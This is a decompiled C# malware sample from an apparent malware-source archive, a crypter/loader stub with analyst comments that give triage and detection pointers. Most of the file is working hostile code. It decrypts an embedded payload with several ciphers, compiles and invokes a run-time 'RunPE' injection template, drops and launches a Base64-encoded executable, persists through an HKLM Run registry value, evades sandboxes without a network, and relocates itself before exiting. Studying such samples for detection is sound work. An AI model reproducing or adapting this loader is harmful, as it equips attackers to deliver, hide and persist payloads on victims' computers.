MalwareSourceCode/MSIL/Virus/Win32/V/Virus.Win32.Virut.ce-c41c86f44216c3054b1e45e53e91cc0e9df01ff509ab0ed824899d4e8d19800d/fjYIWqNzRsrEuPM.cs

// Decompiled with JetBrains decompiler
// Type: fjYIWqNzRsrEuPM
// Assembly: 3, Version=830.23.182.254, Culture=neutral, PublicKeyToken=null
// MVID: 3AB55594-508F-4214-AA1C-DD579280B133
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Virut.ce-c41c86f44216c3054b1e45e53e91cc0e9df01ff509ab0ed824899d4e8d19800d.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using System;
using System.CodeDom.Compiler;
using System.Diagnostics;
using System.IO;
using System.Net.NetworkInformation;
using System.Reflection;
using System.Resources;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Text;
using System.Threading;
using System.Windows.Forms;
[StandardModule]
internal sealed class fjYIWqNzRsrEuPM
{
// Holds the "bind" resource string. Main() assigns it; mMBTPviKNdprvRd() Base64-decodes it and writes it to disk.
public static string yqtchzIOqOKBrSD;
// Holds the "runpe" resource string. Main() fills its %%40%% / %%42%% placeholders and hands the result
// to roKWNVYxmxtHPPs(), which compiles it as Visual Basic source.
public static string lJwYYoItFcgpqET;
// Entry point of the decompiled stub. It reads four strings from the embedded "TempRes" resource set
// ("crypted", "settings", "bind", "runpe"), splits "settings" on '%', and uses the fields as switches:
//   [1]  name of the decoding routine ("RC4", "AES", "DES", "RC2", "STR", "XOR", "TDES")
//   [2]  password/key passed to that routine
//   [3]  "1" -> Daanteys.Enable() (type defined outside this file; purpose not visible here)
//   [4]  "1" -> qfiZEWBAVDVcXYV() (copy to %APPDATA% + HKLM Run value)
//   [5]  "1" -> background thread running mMBTPviKNdprvRd() (drop and start the "bind" blob)
//   [6]  "1" -> show a message box; [7] = icon style, [8] = text, [9] = title
//   [10] "1" -> aXQMuDulpbuaEay() (exit when no network is available)
//   [11] "1" -> coFIciVHjFSurZy() (move own file into the temp directory and exit)
// Field [0] is never read. No bounds or null checks are made on the resource strings or the split array.
// NOTE(review): the repository path labels this sample Virut; the code visible here reads like a
// generic crypter/loader stub, so the label may refer to the wrapped payload - confirm against the binary.
// Triage pointers: the resource names and the %%40%% / %%42%% placeholders are stable strings to search for.
[STAThread]
public static void Main()
{
char ch = '%';
ResourceManager resourceManager = new ResourceManager("TempRes", Assembly.GetExecutingAssembly());
// Unused local; kept as emitted by the decompiler.
Encoding encoding = Encoding.Default;
string str1 = resourceManager.GetString("crypted");
string str2 = resourceManager.GetString("settings");
fjYIWqNzRsrEuPM.yqtchzIOqOKBrSD = resourceManager.GetString("bind");
fjYIWqNzRsrEuPM.lJwYYoItFcgpqET = resourceManager.GetString("runpe");
string[] strArray = str2.Split(ch);
string str3 = strArray[2];
string Left1 = strArray[1];
string Left2 = strArray[4];
string Left3 = strArray[5];
string Left4 = strArray[3];
string Left5 = strArray[11];
string Left6 = strArray[6];
if (Operators.CompareString(strArray[10], "1", false) == 0)
fjYIWqNzRsrEuPM.aXQMuDulpbuaEay();
if (Operators.CompareString(Left4, "1", false) == 0)
Daanteys.Enable();
if (Operators.CompareString(Left3, "1", false) == 0)
new Thread(new ThreadStart(fjYIWqNzRsrEuPM.mMBTPviKNdprvRd))
{
IsBackground = true
}.Start();
// Both branches below do the same thing: decode "crypted" with the selected routine, pass the result
// through CD.format() (defined outside this file), substitute it for %%40%% in the "runpe" template,
// substitute a file path for %%42%%, then compile and invoke the template via roKWNVYxmxtHPPs().
// Only the %%42%% value differs: this executable's own path here, the .NET 2.0 vbc.exe path in the else chain.
// NOTE(review): PlatformID.Win32NT prints as "Win32NT", so this test appears to pass on any NT-based
// Windows regardless of bitness; the vbc.exe chain would then not be reached - confirm dynamically.
// An unrecognised routine name falls through both chains and nothing is compiled.
if (Environment.OSVersion.Platform.ToString().Contains("32") || Environment.OSVersion.Platform.ToString().Contains("86"))
{
if (Operators.CompareString(Left1, "RC4", false) == 0)
fjYIWqNzRsrEuPM.roKWNVYxmxtHPPs(fjYIWqNzRsrEuPM.lJwYYoItFcgpqET.Replace("%%40%%", CD.format(fjYIWqNzRsrEuPM.YkqdEiNjkYEcGHU(str1, str3))).Replace("%%42%%", Application.ExecutablePath));
else if (Operators.CompareString(Left1, "AES", false) == 0)
fjYIWqNzRsrEuPM.roKWNVYxmxtHPPs(fjYIWqNzRsrEuPM.lJwYYoItFcgpqET.Replace("%%40%%", CD.format(fjYIWqNzRsrEuPM.PhCrUkyjFEeSSOb(str1, str3))).Replace("%%42%%", Application.ExecutablePath));
else if (Operators.CompareString(Left1, "DES", false) == 0)
fjYIWqNzRsrEuPM.roKWNVYxmxtHPPs(fjYIWqNzRsrEuPM.lJwYYoItFcgpqET.Replace("%%40%%", CD.format(fjYIWqNzRsrEuPM.DfrVzRBLTZVYiTu(str1, str3))).Replace("%%42%%", Application.ExecutablePath));
else if (Operators.CompareString(Left1, "RC2", false) == 0)
fjYIWqNzRsrEuPM.roKWNVYxmxtHPPs(fjYIWqNzRsrEuPM.lJwYYoItFcgpqET.Replace("%%40%%", CD.format(fjYIWqNzRsrEuPM.VhCqeEsmyAGjexn(str1, str3))).Replace("%%42%%", Application.ExecutablePath));
else if (Operators.CompareString(Left1, "STR", false) == 0)
fjYIWqNzRsrEuPM.roKWNVYxmxtHPPs(fjYIWqNzRsrEuPM.lJwYYoItFcgpqET.Replace("%%40%%", CD.format(fjYIWqNzRsrEuPM.ghWPuuObTVRPWrY(str1, str3))).Replace("%%42%%", Application.ExecutablePath));
else if (Operators.CompareString(Left1, "XOR", false) == 0)
fjYIWqNzRsrEuPM.roKWNVYxmxtHPPs(fjYIWqNzRsrEuPM.lJwYYoItFcgpqET.Replace("%%40%%", CD.format(fjYIWqNzRsrEuPM.ZHfmltHRHxetfJW(str1, str3))).Replace("%%42%%", Application.ExecutablePath));
else if (Operators.CompareString(Left1, "TDES", false) == 0)
fjYIWqNzRsrEuPM.roKWNVYxmxtHPPs(fjYIWqNzRsrEuPM.lJwYYoItFcgpqET.Replace("%%40%%", CD.format(fjYIWqNzRsrEuPM.uwffzkjdFvQZybM(str1, str3))).Replace("%%42%%", Application.ExecutablePath));
}
else if (Operators.CompareString(Left1, "RC4", false) == 0)
fjYIWqNzRsrEuPM.roKWNVYxmxtHPPs(fjYIWqNzRsrEuPM.lJwYYoItFcgpqET.Replace("%%40%%", CD.format(fjYIWqNzRsrEuPM.YkqdEiNjkYEcGHU(str1, str3))).Replace("%%42%%", Environment.GetFolderPath(Environment.SpecialFolder.System).Replace("system32", "") + "Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe"));
else if (Operators.CompareString(Left1, "AES", false) == 0)
fjYIWqNzRsrEuPM.roKWNVYxmxtHPPs(fjYIWqNzRsrEuPM.lJwYYoItFcgpqET.Replace("%%40%%", CD.format(fjYIWqNzRsrEuPM.PhCrUkyjFEeSSOb(str1, str3))).Replace("%%42%%", Environment.GetFolderPath(Environment.SpecialFolder.System).Replace("system32", "") + "Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe"));
else if (Operators.CompareString(Left1, "DES", false) == 0)
fjYIWqNzRsrEuPM.roKWNVYxmxtHPPs(fjYIWqNzRsrEuPM.lJwYYoItFcgpqET.Replace("%%40%%", CD.format(fjYIWqNzRsrEuPM.DfrVzRBLTZVYiTu(str1, str3))).Replace("%%42%%", Environment.GetFolderPath(Environment.SpecialFolder.System).Replace("system32", "") + "Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe"));
else if (Operators.CompareString(Left1, "RC2", false) == 0)
fjYIWqNzRsrEuPM.roKWNVYxmxtHPPs(fjYIWqNzRsrEuPM.lJwYYoItFcgpqET.Replace("%%40%%", CD.format(fjYIWqNzRsrEuPM.VhCqeEsmyAGjexn(str1, str3))).Replace("%%42%%", Environment.GetFolderPath(Environment.SpecialFolder.System).Replace("system32", "") + "Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe"));
else if (Operators.CompareString(Left1, "STR", false) == 0)
fjYIWqNzRsrEuPM.roKWNVYxmxtHPPs(fjYIWqNzRsrEuPM.lJwYYoItFcgpqET.Replace("%%40%%", CD.format(fjYIWqNzRsrEuPM.ghWPuuObTVRPWrY(str1, str3))).Replace("%%42%%", Environment.GetFolderPath(Environment.SpecialFolder.System).Replace("system32", "") + "Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe"));
else if (Operators.CompareString(Left1, "XOR", false) == 0)
fjYIWqNzRsrEuPM.roKWNVYxmxtHPPs(fjYIWqNzRsrEuPM.lJwYYoItFcgpqET.Replace("%%40%%", CD.format(fjYIWqNzRsrEuPM.ZHfmltHRHxetfJW(str1, str3))).Replace("%%42%%", Environment.GetFolderPath(Environment.SpecialFolder.System).Replace("system32", "") + "Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe"));
else if (Operators.CompareString(Left1, "TDES", false) == 0)
fjYIWqNzRsrEuPM.roKWNVYxmxtHPPs(fjYIWqNzRsrEuPM.lJwYYoItFcgpqET.Replace("%%40%%", CD.format(fjYIWqNzRsrEuPM.uwffzkjdFvQZybM(str1, str3))).Replace("%%42%%", Environment.GetFolderPath(Environment.SpecialFolder.System).Replace("system32", "") + "Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe"));
if (Operators.CompareString(Left2, "1", false) == 0)
fjYIWqNzRsrEuPM.qfiZEWBAVDVcXYV();
// Optional message box. Text and title come straight from the settings string, so they are
// per-build values. An empty style string and "Critical" both map to MsgBoxStyle.Critical.
if (Operators.CompareString(Left6, "1", false) == 0)
{
string Left7 = strArray[7];
if (Operators.CompareString(Left7, "", false) == 0)
{
int num1 = (int) Interaction.MsgBox((object) strArray[8], MsgBoxStyle.Critical, (object) strArray[9]);
}
else if (Operators.CompareString(Left7, "Exclamation", false) == 0)
{
int num2 = (int) Interaction.MsgBox((object) strArray[8], MsgBoxStyle.Exclamation, (object) strArray[9]);
}
else if (Operators.CompareString(Left7, "Critical", false) == 0)
{
int num3 = (int) Interaction.MsgBox((object) strArray[8], MsgBoxStyle.Critical, (object) strArray[9]);
}
else if (Operators.CompareString(Left7, "Question", false) == 0)
{
int num4 = (int) Interaction.MsgBox((object) strArray[8], MsgBoxStyle.Question, (object) strArray[9]);
}
else if (Operators.CompareString(Left7, "Information", false) == 0)
{
int num5 = (int) Interaction.MsgBox((object) strArray[8], MsgBoxStyle.Information, (object) strArray[9]);
}
}
// Last step: when field [11] is "1" the stub relocates its own file and terminates.
if (Operators.CompareString(Left5, "1", false) != 0)
return;
fjYIWqNzRsrEuPM.coFIciVHjFSurZy();
}
// Thread body started from Main() when settings field [5] is "1".
// Base64-decodes the "bind" resource string, writes the bytes to <ApplicationData>/temp.exe and starts that file.
// No error handling: a malformed Base64 string or a failed write throws on the background thread.
// Triage pointer: a temp.exe created directly under the roaming AppData folder and launched by the sample process.
public static void mMBTPviKNdprvRd()
{
File.WriteAllBytes(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "/temp.exe", Convert.FromBase64String(fjYIWqNzRsrEuPM.yqtchzIOqOKBrSD));
Process.Start(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "/temp.exe");
}
// Compiles the given Visual Basic source text at run time and invokes the static, parameterless
// method Inject.RunPE.InjectPE from the resulting assembly via reflection.
//   source: complete VB source (the "runpe" template after placeholder substitution in Main()).
// Returns silently when the compiler reports any error; there is no null check on GetType/GetMethod.
// What InjectPE does is defined by the template, which is not part of this file; the type and method
// names suggest process injection - confirm from the decoded "runpe" resource.
// Detection note: GenerateInMemory only controls how the result is loaded. On .NET Framework the CodeDom
// provider normally still launches the command-line VB compiler and writes temporary files, so a
// vbc.exe child process of a non-developer executable is a useful signal here.
public static void roKWNVYxmxtHPPs(string source)
{
CompilerResults compilerResults = new VBCodeProvider().CompileAssemblyFromSource(new CompilerParameters()
{
GenerateExecutable = false,
GenerateInMemory = true
}, source);
if (compilerResults.Errors.Count > 0)
return;
compilerResults.CompiledAssembly.GetType("Inject.RunPE").GetMethod("InjectPE").Invoke((object) null, (object[]) null);
}
// "AES" routine selected by Main(): Rijndael decryption in ECB mode.
//   input: Base64 text of the ciphertext.
//   pass:  password; its ASCII bytes are hashed with MD5 to build the key.
// Returns the plaintext decoded as ASCII, or "" when any exception occurs (the error is swallowed).
// Neither crypto object is disposed.
public static string PhCrUkyjFEeSSOb(string input, string pass)
{
RijndaelManaged rijndaelManaged = new RijndaelManaged();
MD5CryptoServiceProvider cryptoServiceProvider = new MD5CryptoServiceProvider();
string str;
try
{
// 32-byte key built from the 16-byte MD5 digest copied twice. The second copy starts at offset 15,
// not 16, so key[15] is overwritten with hash[0] and key[31] stays 0. Anyone re-implementing the
// decoder for unpacking has to reproduce this exact layout.
byte[] destinationArray = new byte[32];
byte[] hash = cryptoServiceProvider.ComputeHash(Encoding.ASCII.GetBytes(pass));
Array.Copy((Array) hash, 0, (Array) destinationArray, 0, 16);
Array.Copy((Array) hash, 0, (Array) destinationArray, 15, 16);
rijndaelManaged.Key = destinationArray;
// ECB: no IV is involved; padding is left at the class default.
rijndaelManaged.Mode = CipherMode.ECB;
ICryptoTransform decryptor = rijndaelManaged.CreateDecryptor();
byte[] inputBuffer = Convert.FromBase64String(input);
str = Encoding.ASCII.GetString(decryptor.TransformFinalBlock(inputBuffer, 0, inputBuffer.Length));
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
str = "";
ProjectData.ClearProjectError();
}
return str;
}
// "RC4" routine selected by Main(). The three loops follow the RC4 layout: fill the state and key
// tables, run the key-scheduling swap pass, then XOR each input character with the generated keystream.
//   message:  Base64 text; decoded to bytes and then to a string with Encoding.Default.
//   password: key material; characters are used cyclically via Strings.Asc.
// Returns the XOR result as a string built with Strings.Chr. No exception handling: bad Base64 or an
// empty password (modulo by zero) throws to the caller.
// Because Encoding.Default, Strings.Asc and Strings.Chr depend on the system ANSI code page, output
// for bytes above 0x7F may differ between analysis hosts - presumably; verify when replaying the decoder.
public static string YkqdEiNjkYEcGHU(string message, string password)
{
message = Encoding.Default.GetString(Convert.FromBase64String(message));
int index1 = 0;
int index2 = 0;
StringBuilder stringBuilder = new StringBuilder();
// Unused local; kept as emitted by the decompiler.
string empty = string.Empty;
// Tables are allocated with 257 slots but only indexes 0..255 are used.
int[] numArray1 = new int[257];
int[] numArray2 = new int[257];
int length = password.Length;
int location1 = 0;
// Pass 1: numArray1 = identity permutation, numArray2 = password characters repeated to 256 entries.
while (location1 <= (int) byte.MaxValue)
{
char String = password.Substring(location1 % length, 1).ToCharArray()[0];
numArray2[location1] = Strings.Asc(String);
numArray1[location1] = location1;
// Increment idiom; the Math.Max result is discarded, the effect is location1 += 1.
Math.Max(Interlocked.Increment(ref location1), checked (location1 - 1));
}
int index3 = 0;
int location2 = 0;
// Pass 2: key-dependent swaps over the state table.
while (location2 <= (int) byte.MaxValue)
{
index3 = checked (index3 + numArray1[location2] + numArray2[location2]) % 256;
int num = numArray1[location2];
numArray1[location2] = numArray1[index3];
numArray1[index3] = num;
Math.Max(Interlocked.Increment(ref location2), checked (location2 - 1));
}
int location3 = 1;
// Pass 3: one keystream value per input character (location3 is 1-based), XORed with the character code.
while (location3 <= message.Length)
{
index1 = checked (index1 + 1) % 256;
index2 = checked (index2 + numArray1[index1]) % 256;
int num1 = numArray1[index1];
numArray1[index1] = numArray1[index2];
numArray1[index2] = num1;
int num2 = numArray1[checked (numArray1[index1] + numArray1[index2]) % 256];
int CharCode = Strings.Asc(message.Substring(checked (location3 - 1), 1).ToCharArray()[0]) ^ num2;
stringBuilder.Append(Strings.Chr(CharCode));
Math.Max(Interlocked.Increment(ref location3), checked (location3 - 1));
}
string str = stringBuilder.ToString();
stringBuilder.Length = 0;
return str;
}
// "XOR" routine selected by Main(): repeating-key XOR over a hex-encoded string.
//   Input: text made of two hex digits per encoded byte; each pair is parsed through the VB "&H" prefix.
//   pass:  key; characters are used in order and wrap to the start after the last one.
// Returns the decoded characters as a string. No exception handling: an odd-length Input makes
// Substring throw, and non-hex text makes the conversion throw.
// NOTE(review): 'index' is declared inside the loop with no initializer and read before assignment.
// This is how the decompiler rendered it; presumably the original VB local starts at 0 and keeps its
// value across iterations. As written, a C# compiler would reject the read as unassigned.
public static string ZHfmltHRHxetfJW(string Input, string pass)
{
StringBuilder stringBuilder = new StringBuilder();
int num = checked (Input.Length - 1);
int startIndex = 0;
while (startIndex <= num)
{
int index;
string str = Conversions.ToString(Strings.Chr(checked ((int) (Conversions.ToLong("&H" + Input.Substring(startIndex, 2)) ^ (long) Strings.Asc(pass[index])))));
stringBuilder.Append(str);
// Advance the key position, wrapping after the last key character.
if (index == checked (pass.Length - 1))
index = 0;
else
checked { ++index; }
// Two hex digits consumed per iteration.
checked { startIndex += 2; }
}
return stringBuilder.ToString();
}
// "TDES" routine selected by Main(): Triple DES decryption in ECB mode.
//   input: Base64 text of the ciphertext.
//   pass:  password; its ASCII bytes are hashed with MD5 to build the key.
// Returns the plaintext decoded as ASCII, or "" when any exception occurs (the error is swallowed).
// Neither crypto object is disposed.
public static string uwffzkjdFvQZybM(string input, string pass)
{
TripleDESCryptoServiceProvider cryptoServiceProvider1 = new TripleDESCryptoServiceProvider();
MD5CryptoServiceProvider cryptoServiceProvider2 = new MD5CryptoServiceProvider();
string str;
try
{
// 24-byte key: the 16-byte digest, then its first 8 bytes copied to offset 15 (not 16).
// key[15] is therefore overwritten with hash[0] and key[23] stays 0; a re-implementation used
// for unpacking must reproduce this layout.
byte[] destinationArray = new byte[24];
byte[] hash = cryptoServiceProvider2.ComputeHash(Encoding.ASCII.GetBytes(pass));
Array.Copy((Array) hash, 0, (Array) destinationArray, 0, 16);
Array.Copy((Array) hash, 0, (Array) destinationArray, 15, 8);
cryptoServiceProvider1.Key = destinationArray;
// ECB: no IV is involved; padding is left at the class default.
cryptoServiceProvider1.Mode = CipherMode.ECB;
ICryptoTransform decryptor = cryptoServiceProvider1.CreateDecryptor();
byte[] inputBuffer = Convert.FromBase64String(input);
str = Encoding.ASCII.GetString(decryptor.TransformFinalBlock(inputBuffer, 0, inputBuffer.Length));
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
str = "";
ProjectData.ClearProjectError();
}
return str;
}
// "STR" routine selected by Main(), string overload: converts Data and key to bytes with Encoding.Default,
// runs the byte[] overload, and converts the result back to a string with Encoding.Default.
// The round trip depends on the system ANSI code page, so results for non-ASCII input may vary by host.
public static string ghWPuuObTVRPWrY(string Data, string key) => Encoding.Default.GetString(fjYIWqNzRsrEuPM.ghWPuuObTVRPWrY(Encoding.Default.GetBytes(Data), Encoding.Default.GetBytes(key)));
// Byte-level decoder behind the "STR" option. Works in place on Data and returns the same array.
// Walks from the last byte to the first; each byte becomes
//   ((Data[i] XOR key[i mod key.Length]) - Data[(i + 1) mod Data.Length] + 256) mod 256.
// For the last index the "next" byte wraps to Data[0], which has not been rewritten yet; for every
// other index the next byte has already been rewritten by an earlier iteration.
// An empty Data array skips the loop; an empty key with non-empty Data throws on the modulo.
public static byte[] ghWPuuObTVRPWrY(byte[] Data, byte[] key)
{
int index = checked (Data.Length - 1);
while (index >= 0)
{
Data[index] = checked ((byte) unchecked (checked (((int) Data[index] ^ (int) key[unchecked (index % key.Length)]) - (int) Data[unchecked (checked (index + 1) % Data.Length)] + 256) % 256));
checked { index += -1; }
}
return Data;
}
// "RC2" routine selected by Main(): RC2 decryption in ECB mode.
//   input: Base64 text of the ciphertext.
//   pass:  password; the MD5 digest of its ASCII bytes is used directly as the 16-byte key.
// Returns the plaintext decoded as ASCII, or "" when any exception occurs (the error is swallowed).
// Neither crypto object is disposed.
public static string VhCqeEsmyAGjexn(string input, string pass)
{
RC2CryptoServiceProvider cryptoServiceProvider1 = new RC2CryptoServiceProvider();
MD5CryptoServiceProvider cryptoServiceProvider2 = new MD5CryptoServiceProvider();
string str;
try
{
byte[] hash = cryptoServiceProvider2.ComputeHash(Encoding.ASCII.GetBytes(pass));
cryptoServiceProvider1.Key = hash;
// ECB: no IV is involved; padding is left at the class default.
cryptoServiceProvider1.Mode = CipherMode.ECB;
ICryptoTransform decryptor = cryptoServiceProvider1.CreateDecryptor();
byte[] inputBuffer = Convert.FromBase64String(input);
str = Encoding.ASCII.GetString(decryptor.TransformFinalBlock(inputBuffer, 0, inputBuffer.Length));
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
str = "";
ProjectData.ClearProjectError();
}
return str;
}
// "DES" routine selected by Main(): single DES decryption in ECB mode.
//   input: Base64 text of the ciphertext.
//   pass:  password; the first 8 bytes of the MD5 digest of its ASCII bytes form the key.
// Returns the plaintext decoded as ASCII, or "" when any exception occurs (the error is swallowed,
// which includes a key the provider rejects).
// Neither crypto object is disposed.
public static string DfrVzRBLTZVYiTu(string input, string pass)
{
DESCryptoServiceProvider cryptoServiceProvider1 = new DESCryptoServiceProvider();
MD5CryptoServiceProvider cryptoServiceProvider2 = new MD5CryptoServiceProvider();
string str;
try
{
byte[] destinationArray = new byte[8];
Array.Copy((Array) cryptoServiceProvider2.ComputeHash(Encoding.ASCII.GetBytes(pass)), 0, (Array) destinationArray, 0, 8);
cryptoServiceProvider1.Key = destinationArray;
// ECB: no IV is involved; padding is left at the class default.
cryptoServiceProvider1.Mode = CipherMode.ECB;
ICryptoTransform decryptor = cryptoServiceProvider1.CreateDecryptor();
byte[] inputBuffer = Convert.FromBase64String(input);
str = Encoding.ASCII.GetString(decryptor.TransformFinalBlock(inputBuffer, 0, inputBuffer.Length));
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
str = "";
ProjectData.ClearProjectError();
}
return str;
}
// Persistence step, run from Main() when settings field [4] is "1".
// Copies the running executable to <ApplicationData>\jseEiuRiWjuDNIfRFtRiZFMfRFr.exe, then opens
// HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run for writing and, if no value named after
// Application.ProductName exists, creates one pointing at the copy.
// Every exception is swallowed. File.Copy is called without the overwrite flag, so when the copy
// already exists it throws and the registry step is skipped; a failed or null OpenSubKey result
// (for example without write access to HKLM) ends the same way.
// Triage pointers: the fixed file name under the roaming AppData folder, and a machine-wide Run value
// whose data points into a user profile. The value name comes from the assembly's product name, so
// it can differ per build.
public static void qfiZEWBAVDVcXYV()
{
try
{
File.Copy(Application.ExecutablePath, Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\jseEiuRiWjuDNIfRFtRiZFMfRFr.exe");
RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
if (registryKey.GetValue(Application.ProductName) == null)
registryKey.SetValue(Application.ProductName, (object) (Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\jseEiuRiWjuDNIfRFtRiZFMfRFr.exe"));
registryKey.Close();
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
// kernel32 imports used only by coFIciVHjFSurZy().
// GetModuleFileNameA: the module handle is declared as int and the buffer is a VB by-ref string.
[DllImport("kernel32", EntryPoint = "GetModuleFileNameA", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int GetModuleFileName(int hModule, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpFileName, int nSize);
// ExitProcess: ends the process immediately.
[DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int ExitProcess(uint uExitCode);
// Declared as MoveFile but bound to the MoveFileExW entry point.
// NOTE(review): the declaration pairs the wide-character entry point with CharSet.Ansi/LPTStr string
// marshalling and a 64-bit flags parameter where the native API takes a 32-bit DWORD. Whether the
// call succeeds at run time should be confirmed dynamically rather than assumed from the source.
[DllImport("kernel32", EntryPoint = "MoveFileExW", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int MoveFile([MarshalAs(UnmanagedType.LPTStr), In] string lpExistingFileName, [MarshalAs(UnmanagedType.LPTStr), In] string lpNewFileName, long dwFlags);
// Final step, run from Main() when settings field [11] is "1".
// Asks kernel32 for the current module's file name (only the returned length is used), then requests a
// move of the running executable to <temp path>\tmpG<millisecond>.tmp with flags value 8
// (MOVEFILE_WRITE_THROUGH in the Win32 headers), and terminates the process with exit code 0.
// The return value of the move is ignored, so the process exits whether or not the file was moved.
// Path.GetTempPath() already ends with a separator, so the target contains a doubled backslash.
// Triage pointer: tmpG*.tmp files in the user's temp directory that are PE executables.
public static void coFIciVHjFSurZy()
{
string executablePath1 = Application.ExecutablePath;
string executablePath2 = Application.ExecutablePath;
// executablePath2 serves as the output buffer; nSize is fixed at 256.
int moduleFileName = fjYIWqNzRsrEuPM.GetModuleFileName(0, ref executablePath2, 256);
fjYIWqNzRsrEuPM.MoveFile(Strings.Left(executablePath1, moduleFileName), Path.GetTempPath() + "\\tmpG" + DateTime.Now.Millisecond.ToString() + ".tmp", 8L);
fjYIWqNzRsrEuPM.ExitProcess(0U);
}
// Connectivity gate, run from Main() when settings field [10] is "1".
// Returns immediately when NetworkInterface.GetIsNetworkAvailable() reports a network; otherwise shows
// a message box titled "Microsoft Windows" and exits the process with code 0.
// Analysis note: in a sandbox with networking disabled, a build with this option set stops here before
// any decoding or persistence step runs, so an empty behaviour report does not mean the sample is inert.
public static void aXQMuDulpbuaEay()
{
if (NetworkInterface.GetIsNetworkAvailable())
return;
int num = (int) Interaction.MsgBox((object) "You need an Internet Connection to run this programm !", Title: ((object) "Microsoft Windows"));
Environment.Exit(0);
}
}